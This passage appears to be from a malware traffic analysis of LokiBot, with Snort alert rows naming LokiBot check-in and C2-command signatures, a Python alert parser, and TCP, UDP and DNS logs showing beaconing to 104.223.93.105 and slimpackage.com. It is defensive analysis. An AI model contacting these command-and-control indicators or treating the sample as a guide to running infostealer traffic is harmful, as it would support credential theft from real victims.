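01/14/22-09:24:24.618610 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49745 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:26.009494 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49746 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:26.009494 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49746 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:26.009494 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49746 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:27.434582 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49747 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:27.434582 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49747 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:27.434582 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49747 | 80 | 192.168.2.3 | 104.223.93.105
"""


def parse_alerts(text):
    """Parse pipe-separated alert rows into dicts with typed fields."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, proto, sid, msg, sport, dport, src, dst = (c.strip() for c in line.split("|"))
        rows.append({
            "ts": datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f"),
            "proto": proto, "sid": int(sid), "msg": msg,
            "sport": int(sport), "dport": int(dport), "src": src, "dst": dst,
        })
    return rows


def summarise(rows):
    """Hits per rule, C2 peers, and the beacon interval. Snort raises its three LokiBot
    rules on the same packet of each connection, so alerts are collapsed on
    (timestamp, source port) to count connections rather than rule hits."""
    by_sid = {}
    for r in rows:
        by_sid.setdefault(r["sid"], {"msg": r["msg"], "hits": 0})["hits"] += 1
    peers = sorted({(r["dst"], r["dport"], r["proto"]) for r in rows})
    conns = sorted({(r["ts"], r["sport"]) for r in rows})
    gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(conns, conns[1:])]
    return {
        "by_sid": by_sid,
        "peers": peers,
        "connections": len(conns),
        "gaps": gaps,
        "beacon_median_s": median(gaps) if gaps else None,
    }
```

`summarise(parse_alerts(ALERTS))` reports five connections to a single peer, 104.223.93.105:80, with a median gap of about 1.5 s between them; feeding it all 168 rows from the table gives the 56-connection picture described above. The collapse on (timestamp, source port) matters: counting raw alerts would triple every figure and make a single check-in look like three events.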

                    Network Port Distribution

                    TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 14, 2022 09:24:21.054052114 CET | 49743 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:21.207153082 CET | 80 | 49743 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:21.207262993 CET | 49743 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:21.210021973 CET | 49743 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:21.332510948 CET | 80 | 49743 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:21.332616091 CET | 49743 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:21.455492973 CET | 80 | 49743 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:21.478250980 CET | 80 | 49743 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:21.478285074 CET | 80 | 49743 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:21.478480101 CET | 49743 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:21.478532076 CET | 49743 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:21.601222038 CET | 80 | 49743 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:22.870625973 CET | 49744 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:22.994765043 CET | 80 | 49744 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:22.994929075 CET | 49744 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:22.998234034 CET | 49744 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:23.122327089 CET | 80 | 49744 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:23.122443914 CET | 49744 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:23.246737957 CET | 80 | 49744 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:23.255940914 CET | 80 | 49744 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:23.255974054 CET | 80 | 49744 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:23.256108046 CET | 49744 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:23.256242037 CET | 49744 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:23.381480932 CET | 80 | 49744 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:24.492712021 CET | 49745 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:24.615272999 CET | 80 | 49745 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:24.615441084 CET | 49745 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:24.618609905 CET | 49745 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:24.743750095 CET | 80 | 49745 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:24.744019032 CET | 49745 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:24.867125034 CET | 80 | 49745 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:24.875466108 CET | 80 | 49745 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:24.875560999 CET | 80 | 49745 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:24.875665903 CET | 49745 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:24.875752926 CET | 49745 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:24.999078989 CET | 80 | 49745 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:25.878114939 CET | 49746 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:26.005634069 CET | 80 | 49746 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:26.005755901 CET | 49746 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:26.009494066 CET | 49746 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:26.133670092 CET | 80 | 49746 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:26.133810043 CET | 49746 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:26.297760010 CET | 80 | 49746 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:26.305594921 CET | 80 | 49746 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:26.305648088 CET | 80 | 49746 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:26.305731058 CET | 49746 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:26.305815935 CET | 49746 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:26.431415081 CET | 80 | 49746 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:27.290039062 CET | 49747 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:27.414261103 CET | 80 | 49747 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:27.414413929 CET | 49747 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:27.434581995 CET | 49747 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:27.558733940 CET | 80 | 49747 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:27.558836937 CET | 49747 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:27.683128119 CET | 80 | 49747 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:27.691371918 CET | 80 | 49747 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:27.691415071 CET | 80 | 49747 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:27.691529989 CET | 49747 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:27.799938917 CET | 49747 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:27.924349070 CET | 80 | 49747 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:29.116728067 CET | 49748 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:29.239994049 CET | 80 | 49748 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:29.240096092 CET | 49748 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:29.242786884 CET | 49748 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:29.365590096 CET | 80 | 49748 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:29.365705967 CET | 49748 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:29.488169909 CET | 80 | 49748 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:29.497827053 CET | 80 | 49748 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:29.497994900 CET | 80 | 49748 | 104.223.93.105 | 192.168.2.3
Jan 14, 2022 09:24:29.498007059 CET | 49748 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:29.498078108 CET | 49748 | 80 | 192.168.2.3 | 104.223.93.105
Jan 14, 2022 09:24:29.620392084 CET | 80 | 49748 | 104.223.93.105 | 192.168.2.3
                    Jan 14, 2022 09:24:31.220026016 CET4974980192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:31.343312979 CET8049749104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:31.345665932 CET4974980192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:31.358483076 CET4974980192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:31.481452942 CET8049749104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:31.482966900 CET4974980192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:31.605992079 CET8049749104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:31.613352060 CET8049749104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:31.613394022 CET8049749104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:31.613600969 CET4974980192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:31.613636017 CET4974980192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:31.736718893 CET8049749104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:32.716247082 CET4975080192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:32.840451956 CET8049750104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:32.840559959 CET4975080192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:32.843753099 CET4975080192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:32.967989922 CET8049750104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:32.968264103 CET4975080192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:33.092286110 CET8049750104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:33.104927063 CET8049750104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:33.105046988 CET4975080192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:33.105072021 CET8049750104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:33.105446100 CET4975080192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:33.229341984 CET8049750104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:34.115823984 CET4975180192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:34.240261078 CET8049751104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:34.240426064 CET4975180192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:34.253885984 CET4975180192.168.2.3104.223.93.105

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 14, 2022 09:24:21.022842884 CET | 52206 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:21.041994095 CET | 53 | 52206 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:22.849410057 CET | 56844 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:22.866626978 CET | 53 | 56844 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:24.288374901 CET | 58045 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:24.491199017 CET | 53 | 58045 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:25.847758055 CET | 57459 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:25.866981983 CET | 53 | 57459 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:27.266596079 CET | 57875 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:27.286494970 CET | 53 | 57875 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:29.095956087 CET | 54154 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:29.115494967 CET | 53 | 54154 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:31.097424030 CET | 52806 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:31.216502905 CET | 53 | 52806 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:32.593902111 CET | 53910 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:32.714936018 CET | 53 | 53910 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:34.094069958 CET | 64021 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:34.113398075 CET | 53 | 64021 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:35.468458891 CET | 60784 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:35.592550993 CET | 53 | 60784 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:36.883899927 CET | 51143 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:36.901443005 CET | 53 | 51143 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:38.276895046 CET | 56009 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:38.296339035 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:40.867846012 CET | 59026 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:40.886985064 CET | 53 | 59026 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:43.616820097 CET | 60823 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:43.636513948 CET | 53 | 60823 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:46.233131886 CET | 52130 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:46.252554893 CET | 53 | 52130 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:48.821882010 CET | 55102 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:49.035787106 CET | 53 | 55102 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:50.665076017 CET | 56236 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:50.684350014 CET | 53 | 56236 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:53.359229088 CET | 56527 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:53.376399994 CET | 53 | 56527 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:54.650913954 CET | 49559 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:54.670542955 CET | 53 | 49559 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:56.439022064 CET | 52650 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:56.458235979 CET | 53 | 52650 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:24:58.337716103 CET | 63297 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:24:58.357232094 CET | 53 | 63297 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:00.348035097 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:00.367105961 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:02.026684046 CET | 53615 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:02.045928001 CET | 53 | 53615 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:04.672275066 CET | 53777 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:04.691482067 CET | 53 | 53777 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:07.196717978 CET | 57106 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:07.216022968 CET | 53 | 57106 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:08.780100107 CET | 60352 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:08.799689054 CET | 53 | 60352 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:10.754543066 CET | 56773 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:10.773690939 CET | 53 | 56773 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:12.293100119 CET | 51539 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:12.312412024 CET | 53 | 51539 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:13.731146097 CET | 58540 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:13.749931097 CET | 53 | 58540 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:17.017800093 CET | 64432 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:17.037441015 CET | 53 | 64432 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:20.107772112 CET | 49250 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:20.125149012 CET | 53 | 49250 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:24.253489017 CET | 63490 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:24.272874117 CET | 53 | 63490 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:27.264767885 CET | 61120 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:27.282341003 CET | 53 | 61120 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:32.635539055 CET | 53079 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:32.654656887 CET | 53 | 53079 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:35.461828947 CET | 50824 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:35.481163979 CET | 53 | 50824 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:37.798146009 CET | 56706 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:37.817436934 CET | 53 | 56706 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:40.044013977 CET | 53569 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:40.063594103 CET | 53 | 53569 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:42.948643923 CET | 62855 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:42.968004942 CET | 53 | 62855 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:44.363774061 CET | 51046 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:44.381669998 CET | 53 | 51046 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:45.760132074 CET | 65501 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:45.777311087 CET | 53 | 65501 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:47.734616995 CET | 53465 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:47.753484011 CET | 53 | 53465 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:49.878865957 CET | 49290 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:49.898205996 CET | 53 | 49290 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:53.184317112 CET | 59754 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:53.204303026 CET | 53 | 59754 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:55.338282108 CET | 49234 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:55.357494116 CET | 53 | 49234 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:25:57.269567966 CET | 58720 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:25:57.287251949 CET | 53 | 58720 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:26:01.674140930 CET | 57447 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:26:01.693149090 CET | 53 | 57447 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:26:03.396339893 CET | 63583 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:26:03.415883064 CET | 53 | 63583 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:26:04.867762089 CET | 64099 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:26:04.887339115 CET | 53 | 64099 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:26:06.348675013 CET | 64610 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:26:06.367301941 CET | 53 | 64610 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:26:07.753612041 CET | 51989 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:26:07.772936106 CET | 53 | 51989 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:26:09.111833096 CET | 53152 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:26:09.131659985 CET | 53 | 53152 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:26:10.694483995 CET | 61590 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:26:10.713933945 CET | 53 | 61590 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:26:12.039196014 CET | 56077 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:26:12.058365107 CET | 53 | 56077 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:26:13.663563013 CET | 57951 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:26:13.683290958 CET | 53 | 57951 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:26:15.080522060 CET | 53276 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:26:15.100056887 CET | 53 | 53276 | 8.8.8.8 | 192.168.2.3
Jan 14, 2022 09:26:16.596752882 CET | 60135 | 53 | 192.168.2.3 | 8.8.8.8
Jan 14, 2022 09:26:16.615869999 CET | 53 | 60135 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 14, 2022 09:24:21.022842884 CET | 192.168.2.3 | 8.8.8.8 | 0x789f | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:22.849410057 CET | 192.168.2.3 | 8.8.8.8 | 0x22ad | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:24.288374901 CET | 192.168.2.3 | 8.8.8.8 | 0xba3 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:25.847758055 CET | 192.168.2.3 | 8.8.8.8 | 0x2a61 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:27.266596079 CET | 192.168.2.3 | 8.8.8.8 | 0xbe4f | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:29.095956087 CET | 192.168.2.3 | 8.8.8.8 | 0x80ee | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:31.097424030 CET | 192.168.2.3 | 8.8.8.8 | 0x5133 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:32.593902111 CET | 192.168.2.3 | 8.8.8.8 | 0xa9f0 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:34.094069958 CET | 192.168.2.3 | 8.8.8.8 | 0xb702 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:35.468458891 CET | 192.168.2.3 | 8.8.8.8 | 0xc19a | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:36.883899927 CET | 192.168.2.3 | 8.8.8.8 | 0x7f02 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:38.276895046 CET | 192.168.2.3 | 8.8.8.8 | 0x2de0 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:40.867846012 CET | 192.168.2.3 | 8.8.8.8 | 0xdba5 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:43.616820097 CET | 192.168.2.3 | 8.8.8.8 | 0xcbec | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:46.233131886 CET | 192.168.2.3 | 8.8.8.8 | 0x18f2 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:48.821882010 CET | 192.168.2.3 | 8.8.8.8 | 0xf39f | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:50.665076017 CET | 192.168.2.3 | 8.8.8.8 | 0xf7c | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:53.359229088 CET | 192.168.2.3 | 8.8.8.8 | 0xc6cb | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:54.650913954 CET | 192.168.2.3 | 8.8.8.8 | 0x7b32 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:56.439022064 CET | 192.168.2.3 | 8.8.8.8 | 0x1025 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:24:58.337716103 CET | 192.168.2.3 | 8.8.8.8 | 0x8a91 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:00.348035097 CET | 192.168.2.3 | 8.8.8.8 | 0xa699 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:02.026684046 CET | 192.168.2.3 | 8.8.8.8 | 0x64a4 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:04.672275066 CET | 192.168.2.3 | 8.8.8.8 | 0x1fdc | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:07.196717978 CET | 192.168.2.3 | 8.8.8.8 | 0x732b | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:08.780100107 CET | 192.168.2.3 | 8.8.8.8 | 0x50d5 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:10.754543066 CET | 192.168.2.3 | 8.8.8.8 | 0xb1d8 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:12.293100119 CET | 192.168.2.3 | 8.8.8.8 | 0xdff | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:13.731146097 CET | 192.168.2.3 | 8.8.8.8 | 0xe76e | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:17.017800093 CET | 192.168.2.3 | 8.8.8.8 | 0xd636 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:20.107772112 CET | 192.168.2.3 | 8.8.8.8 | 0x3f01 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:24.253489017 CET | 192.168.2.3 | 8.8.8.8 | 0x2fa3 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:27.264767885 CET | 192.168.2.3 | 8.8.8.8 | 0xa16a | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:32.635539055 CET | 192.168.2.3 | 8.8.8.8 | 0x1f06 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:35.461828947 CET | 192.168.2.3 | 8.8.8.8 | 0x3be0 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:37.798146009 CET | 192.168.2.3 | 8.8.8.8 | 0x99c0 | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
Jan 14, 2022 09:25:40.044013977 CET | 192.168.2.3 | 8.8.8.8 | 0xead | Standard query (0) | slimpackage.com | A (IP address) | IN (0x0001)
